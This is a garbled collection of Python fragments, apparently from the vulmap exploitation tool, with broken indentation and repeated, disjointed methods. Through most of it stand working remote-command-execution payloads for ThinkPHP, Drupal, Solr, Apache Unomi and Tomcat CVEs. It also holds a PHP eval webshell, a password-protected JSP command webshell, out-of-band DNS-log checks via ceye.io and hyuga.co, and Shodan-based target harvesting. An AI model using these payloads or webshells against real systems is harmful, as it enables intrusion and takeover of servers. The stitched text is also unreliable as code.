self.ua = globals.get_value("UA") # 获取全局变量UA
self.timeout = globals.get_value("TIMEOUT") # 获取全局变量UA
self.headers = globals.get_value("HEADERS") # 获取全局变量HEADERS
self.threadLock = threading.Lock()
def exploit_print(request, raw_data):
delay = globals.get_value("DELAY") # 获取全局变量DELAY
debug = globals.get_value("DEBUG") # 获取全局变量DEBUG
if debug == "debug":
print(raw_data)
elif r"PoC_WaTinG" in request:
print(now.timed(de=delay) + color.red_warn() + color.magenta(" Command Executed Failed... ..."))
else:
print(request)
def __init__(self, url):
self.url = url
self.raw_data = None
self.vul_info = {}
self.ua = globals.get_value("UA") # 获取全局变量UA
self.timeout = globals.get_value("TIMEOUT") # 获取全局变量UA
self.headers = globals.get_value("HEADERS") # 获取全局变量HEADERS
self.threadLock = threading.Lock()
self.payload_time_2021_0515 = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn">
def ceye_io(md):
ceye_token = globals.get_value("ceye_token")
api_url = "http://api.ceye.io/v1/records?type=dns&token=" + ceye_token
headers = globals.get_value("HEADERS") # 获取全局变量HEADERS
res = requests.get(api_url,
headers=headers,
timeout=timeout,
verify=False)
if md in res.text:
return md
def survival_check(url):
try:
timeout = globals.get_value("TIMEOUT") # 获取全局变量TIMEOUT
headers = globals.get_value("HEADERS")
target = url_check(url)
requests.get(target, timeout=timeout, headers=headers, verify=False)
return "s"
except requests.exceptions.ConnectionError:
return "f"
except requests.exceptions.Timeout:
return "f"
def error_print(prt_name):
delay = globals.get_value("DELAY") # 获取全局变量DELAY
debug = globals.get_value("DEBUG") # 获取全局变量DEBUG
if debug == "debug":
print(now.timed(de=delay) + color.magenta("[-] The target no " + color.magenta(prt_name)))
else:
print("\r{0}{1}{2}".format(now.timed(de=delay),
color.magenta("[-] The target no "),
color.magenta(prt_name)),
end=" \r",
flush=True)
def connection_print(prt_name):
delay = globals.get_value("DELAY") # 获取全局变量DELAY
debug = globals.get_value("DEBUG") # 获取全局变量DEBUG
if debug == "debug":
print(now.timed(de=delay) + color.red_warn() +
color.cyan(" " + prt_name + " check failed because unable to connect !!!"))
else:
print("\r{0}{1}{2}".format(now.timed(de=delay),
color.red_warn(),
color.cyan(" " + prt_name + " connection failed !!!")),
end=" \r",
flush=True)
def ceye():
timeout = globals.get_value("TIMEOUT") # 获取全局变量UA
headers = globals.get_value("HEADERS") # 获取全局变量HEADERS
ceye_domain = globals.get_value("ceye_domain")
ceye_token = globals.get_value("ceye_token")
ceye_token = globals.get_value("ceye_token")
api_url = "http://api.ceye.io/v1/records?type=dns&token=" + ceye_token
res = requests.get(api_url, headers=headers, timeout=timeout, verify=False)
if res.status_code != 200:
print(
now.timed(de=0) + color.red_warn() +
color.red(" Ceye.io: " + res.text))
return res.text
def __init__(self, url):
self.url = url
if r"/#/overview/" in self.url:
self.url = self.url[:-12]
if r"/#/overview" in self.url:
self.url = self.url[:-11]
self.raw_data = None
self.vul_info = {}
self.ua = globals.get_value("UA") # 获取全局变量UA
self.timeout = globals.get_value("TIMEOUT") # 获取全局变量UA
self.headers = globals.get_value("HEADERS") # 获取全局变量HEADERS
self.threadLock = threading.Lock()
def __init__(self, url):
self.url = url
if self.url[-1] == "/":
self.url = self.url[:-1]
self.raw_data = None
self.vul_info = {}
self.ua = globals.get_value("UA") # 获取全局变量UA
self.timeout = globals.get_value("TIMEOUT") # 获取全局变量UA
self.headers = globals.get_value("HEADERS") # 获取全局变量HEADERS
self.threadLock = threading.Lock()
self.payload_cve_2020_13942 = '''{ "filters": [ { "id": "myfilter1_anystr", "filters": [ { "condition": {''' \
'''"parameterValues": { "": "script::Runtime r = Runtime.getRuntime(); ''' \
'''r.exec(\\"RECOMMAND\\");" }, "type": "profilePropertyCondition" } } ] } ''' \
'''], "sessionId": "test-demo-session-id_anystr" }'''
def __init__(self, url):
self.url = url
self.raw_data = None
self.vul_info = {}
self.ua = globals.get_value("UA") # 获取全局变量UA
self.timeout = globals.get_value("TIMEOUT") # 获取全局变量UA
self.headers = globals.get_value("HEADERS") # 获取全局变量HEADERS
self.threadLock = threading.Lock()
self.jsp_webshell = '<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><' \
'%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro =' \
' Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInpu' \
'tStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.cl' \
'ose();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("password".equ' \
'als(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCm' \
'd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'
def __init__(self, url):
self.url = url
if self.url[-1] == "/":
self.url = self.url[:-1]
self.raw_data = None
self.vul_info = {}
self.ua = globals.get_value("UA") # 获取全局变量UA
self.timeout = globals.get_value("TIMEOUT") # 获取全局变量UA
self.headers = globals.get_value("HEADERS") # 获取全局变量HEADERS
self.threadLock = threading.Lock()
self.payload_cve_2018_20062 = "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=RECOMMAND"
self.payload_cve_2019_9082 = ("/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&"
"vars[0]=system&vars[1][]=RECOMMAND")
self.payload_cve_2019_9082_webshell = ("/index.php/?s=/index/\\think\\app/invokefunction&function="
"call_user_func_array&vars[0]=file_put_contents&vars[1][]=FILENAME&vars[1][]=<?php%20eval"
"(@$_POST[%27SHELLPASS%27]);?>")
def output(types, item):
try:
o_text = globals.get_value("O_TEXT")
o_json = globals.get_value("O_JSON")
if o_text and types == "text":
output_text(o_text, item)
elif o_json and types == "json":
output_json(o_json, item)
else:
pass
except Exception as error:
print(
now.timed(de=0) +
color.red("[ERROR] " +
error.__traceback__.tb_frame.f_globals['__file__'] +
" " + str(error.__traceback__.tb_lineno)))
def proxy_set(pr, pr_mode):
headers = globals.get_value("HEADERS") # 获取全局变量HEADERS
try:
proxy_ip = str(re.search(r"(.*):", pr).group(1))
proxy_port = int(re.search(r":(.*)", pr).group(1))
except AttributeError:
print(
now.timed(de=0) + color.red_warn() + color.red(
" Proxy format error (e.g. --proxy-socks 127.0.0.1:1080)"))
sys.exit(0)
if r"socks" in pr_mode:
socks.set_default_proxy(socks.SOCKS5, proxy_ip, proxy_port)
elif r"http" in pr_mode:
socks.set_default_proxy(socks.HTTP, addr=proxy_ip, port=proxy_port)
socket.socket = socks.socksocket
try:
proxy_ip_info = requests.get("http://api.hostip.info/get_json.php",
headers=headers,
timeout=5)
proxy_ip_info_json = json.loads(proxy_ip_info.text)
proxy_ip_info_dict = "[region: " + proxy_ip_info_json[
"country_name"] + "] " + "[city: " + proxy_ip_info_json[
"city"] + "] " + "[proxy ip: " + proxy_ip_info_json["ip"] + "]"
except requests.exceptions.ConnectionError:
proxy_ip_info_dict = "[region: ???] [city: ???] [proxy ip: ???]"
except requests.exceptions.Timeout:
proxy_ip_info_dict = "[region: ???] [city: ???] [proxy ip: ???]"
print(
now.timed(de=0) + color.yel_info() +
color.yellow(" Use custom proxy: " + pr))
print(
now.timed(de=0) + color.yel_info() +
color.yellow(" Proxy info: " + proxy_ip_info_dict))
def _http_conn(url):
try:
timeout = globals.get_value("TIMEOUT") # 获取全局变量TIMEOUT
headers = globals.get_value("HEADERS")
target = url_check(url)
requests.get(target,
timeout=timeout,
headers=headers,
verify=False)
return "s"
except requests.exceptions.ConnectionError:
return "f"
except requests.exceptions.Timeout:
return "f"
# add by https://github.com/zhzyker/vulmap/issues/30 @zilong3033 fix url extract
except requests.exceptions.InvalidURL:
return "f"
def __init__(self, url):
self.url = url
if self.url[-1] == "/":
self.url = self.url[:-1]
self.raw_data = None
self.vul_info = {}
self.ua = globals.get_value("UA") # 获取全局变量UA
self.timeout = globals.get_value("TIMEOUT") # 获取全局变量UA
self.headers = globals.get_value("HEADERS") # 获取全局变量HEADERS
self.threadLock = threading.Lock()
self.payload_cve_2018_7600 = (
"form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=system&mail"
"[#type]=markup&mail[#markup]=RECOMMAND")
self.payload_cve_2019_6340 = "{\r\n\"link\":[\r\n{\r\n\"value\":\"link\",\r\n\"options\":\"O:24:\\\"" \
"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\"" \
";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp" \
"\\\\HandlerStack\\u0000handler\\\";s:%s:\\\"%s\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\" \
"u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\" \
"u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve" \
"\\\";}}\"\r\n}\r\n],\r\n\"_links\":{\r\n\"type\":{\r\n\"href\":\"%s/rest/type/shortcut/default" \
"\"\r\n}\r\n}\r\n}"
def shodan_api(shodan_keyword):
try:
shodan_key = globals.get_value("shodan_key")
api = shodan.Shodan(shodan_key)
res = api.search(shodan_keyword)
shodan_target = []
for result in res['matches']:
shodan_target.append("%s:%s" % (result['ip_str'], result['port']))
return shodan_target
except shodan_key.APIError as e:
print(now.timed(de=0) + color.red_warn() + color.red(" Shodan api: " + str(e)))
exit(0)
def __init__(self, url):
self.url = url
self.raw_data = None
self.vul_info = {}
self.r = "PoC_WaTinG"
self.ua = globals.get_value("UA") # 获取全局变量UA
self.timeout = globals.get_value("TIMEOUT") # 获取全局变量UA
self.headers = globals.get_value("HEADERS") # 获取全局变量HEADERS
self.threadLock = threading.Lock()
# Change the url format to conform to the program
if self.url[-1] == "/":
self.url = self.url[:-1]
self.getipport = urlparse(self.url)
self.hostname = self.getipport.hostname
self.port = self.getipport.port
if self.port == None and r"https://" in self.url:
self.port = 443
elif self.port == None and r"http://" in self.url:
self.port = 80
if r"https://" in self.url:
self.url = "https://" + self.hostname + ":" + str(self.port)
if r"http://" in self.url:
self.url = "http://" + self.hostname + ":" + str(self.port)
self.payload_cve_2017_12629 = '{"add-listener":{"event":"postCommit","name":"new_core","class":"solr.RunExecu' \
'tableListener","exe":"sh","dir":"/bin/","args":["-c", "RECOMMAND"]}}'
self.payload_cve_2019_0193 = "command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test" \
"&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5B" \
"CDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22RECOMMAND%22)%3B%0A++++++" \
"++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++" \
"++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%2" \
"2XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3A" \
"poc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport"
self.payload_cve_2019_17558 = "/select?q=1&&wt=velocity&v.template=cus" \
"tom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.for" \
"Name(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27" \
"java.lang.Character%27))+%23set($str=$x.class.forName(%27java.l" \
"ang.String%27))+%23set($ex=$rt.getRuntime().exec(%27RECOMMAND%2" \
"7))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach(" \
"$i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read" \
"()))%23end"
def __init__(self, url):
self.url = url
self.raw_data = None
self.vul_info = {}
self.ua = globals.get_value("UA") # 获取全局变量UA
self.timeout = globals.get_value("TIMEOUT") # 获取全局变量UA
self.headers = globals.get_value("HEADERS") # 获取全局变量HEADERS
self.ceye_domain = globals.get_value("ceye_domain")
self.ceye_token = globals.get_value("ceye_token")
self.ceye_api = globals.get_value("ceye_api")
self.threadLock = threading.Lock()
self.getipport = urlparse(self.url)
self.hostname = self.getipport.hostname
self.port = self.getipport.port
if self.port == None and r"https://" in self.url:
self.port = 443
elif self.port == None and r"http://" in self.url:
self.port = 80
# Do not use the payload:CVE-2017-12615 when checking
# Use the payload:CVE-2017-12615 when exploiting
# Because it is too harmful
self.payload_cve_2017_12615 = '<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><' \
'%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro =' \
' Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInpu' \
'tStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.cl' \
'ose();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("password".equ' \
'als(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCm' \
'd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'
def __init__(self, url):
self.url = url
self.raw_data = None
self.vul_info = {}
self.ua = globals.get_value("UA") # 获取全局变量UA
self.timeout = globals.get_value("TIMEOUT") # 获取全局变量UA
self.delay = globals.get_value("DELAY")
self.headers = globals.get_value("HEADERS") # 获取全局变量HEADERS
self.ceye_domain = globals.get_value("ceye_domain")
self.ceye_token = globals.get_value("ceye_token")
self.ceye_api = globals.get_value("ceye_api")
def survival_check(url):
if globals.get_value("CHECK") == "on":
def _socket_conn(url):
try:
getipport = urlparse(url)
hostname = getipport.hostname
port = getipport.port
if port == None and r"https://" in url:
port = 443
elif port == None and r"http://" in url:
port = 80
else:
port = 80
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect((hostname, port))
sock.close()
return "s"
except socket.timeout:
return "f"
except ConnectionRefusedError:
return "f"
except:
return "f"
def _http_conn(url):
try:
timeout = globals.get_value("TIMEOUT") # 获取全局变量TIMEOUT
headers = globals.get_value("HEADERS")
target = url_check(url)
requests.get(target,
timeout=timeout,
headers=headers,
verify=False)
return "s"
except requests.exceptions.ConnectionError:
return "f"
except requests.exceptions.Timeout:
return "f"
# add by https://github.com/zhzyker/vulmap/issues/30 @zilong3033 fix url extract
except requests.exceptions.InvalidURL:
return "f"
if _socket_conn(url) == "s":
return "s"
elif _http_conn(url) == "s":
return "s"
else:
return "f"
def hyuga_co(md):
headers_hyuga = {
'User-Agent':
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
'Connection': 'close',
'Accept': '*/*',
'Accept-Language':
'zh,zh-TW;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6'
}
hyuga_token = globals.get_value("hyuga_token")
hyuga_url = "http://api.hyuga.co/v1/records?type=dns&token=" + hyuga_token
dns = requests.get(hyuga_url,
headers=headers_hyuga,
timeout=timeout,
verify=False)
if md in dns.text:
return md
